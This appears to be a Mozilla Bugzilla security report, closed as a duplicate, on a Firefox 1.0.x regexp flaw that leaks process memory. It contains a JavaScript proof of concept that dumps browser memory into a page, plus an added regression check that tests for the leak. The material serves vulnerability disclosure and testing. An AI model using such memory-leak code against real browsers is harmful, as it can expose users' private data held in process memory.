Closed Bug 288608 Opened 20 years ago Closed 20 years ago

can access to the memory of firefox process while executing special formed regexp

Categories

(Firefox :: General, defect)

x86
Windows Server 2003
defect
Not set
critical

RESOLVED DUPLICATE of bug 288688

People

(Reporter: inthrax, Assigned: bugzilla)

Details

(Whiteboard: [sg:dupe 288688])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1

When executing special JavaScript code, the result value has some binary block in it; I think that is Firefox process memory. Sometimes while processing this operation Firefox crashes.

Reproducible: Always

Steps to Reproduce:
1. Just execute this JavaScript:

    function genGluck(str){
        var x = str;
        var rx = /end/i;
        x = x.replace(rx, function($1){
            // the same regexp is used again inside the replace callback
            $1.match(rx);
            return "";
        });
        x = x.replace(/^end/, "");
        return x;
    }
    var mem = genGluck("XXXXXXXXXXXXXXXXend");
    document.write(mem);

Actual Results:
We have in the variable called "mem" a memory dump in size of "length passed string" - 6. Every time the dump is different, but for sure it relies on the browser process.
Sometimes (avg: one in twenty or more) it crashes:
Faulting application firefox.exe, version 1.0.1.0, faulting module js3250.dll, version 4.0.0.0, fault address 0x00002b0b.

Expected Results:
Such a regular expression should only replace the search word (in the example, "end") with nothing.

I've tested this bug on Firefox 1.0.1 itself and on Firefox 1.0.2 remotely.
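A regression check for the behaviour this report describes, added here as an example (it is not part of the original report or of Mozilla's test suite): it runs the reporter's `genGluck` over constructed inputs of many lengths and flags any result that differs from an expectation computed without regular expressions, or that contains characters not present in the input. `expectedResult` and `auditReentrantReplace` are hypothetical helper names.

```javascript
// Reporter's reproducer, behaviour unchanged.
function genGluck(str) {
  var x = str;
  var rx = /end/i;
  x = x.replace(rx, function ($1) {
    $1.match(rx); // regexp re-entered from inside the replace callback
    return "";
  });
  x = x.replace(/^end/, "");
  return x;
}

// Hypothetical helper: expected value computed with plain string operations,
// so a faulty regexp engine cannot corrupt the reference result.
function expectedResult(input) {
  const i = input.toLowerCase().indexOf("end");
  const out = i < 0 ? input : input.slice(0, i) + input.slice(i + 3);
  return out.startsWith("end") ? out.slice(3) : out;
}

// Hypothetical helper: the report says the leaked block scales with the
// input length, so sweep many lengths. All inputs are constructed samples.
function auditReentrantReplace(maxPad) {
  const failures = [];
  const tails = ["end", "END", "endend", "en", ""];
  for (let n = 0; n <= maxPad; n++) {
    for (const tail of tails) {
      const input = "X".repeat(n) + tail;
      const got = genGluck(input);
      // A correct replace can only return characters taken from the input.
      const foreign = [...got].some((c) => !input.includes(c));
      if (got !== expectedResult(input) || foreign) {
        failures.push({ input: input, gotLength: got.length, foreign: foreign });
      }
    }
  }
  return failures;
}

const failures = auditReentrantReplace(64);
console.log(failures.length === 0 ? "PASS" : "FAIL: " + JSON.stringify(failures[0]));
```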
I'm a newbie at Bugzilla. This is the very first bug I've added. So if something's wrong, please correct me. Also, there are a lot of tests on the page http://cubic.xfo.org.ru/index.cgi?read=53004.

Bug affects:
Firefox Win32
Firefox Linux (Tested: Debian, SUSE, ASPLinux, Fedora)
Epiphany
Galeon
MultiZilla
...
And I think all Gecko-based browsers.
*** This bug has been marked as a duplicate of 288688 ***
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Whiteboard: [sg:dupe 288688]
Group: security
Thank you very much for reporting this here and setting the security flag. Because this flaw was posted publicly we happened to get multiple reports, but normally that would not be the case and we appreciate your effort to let us know.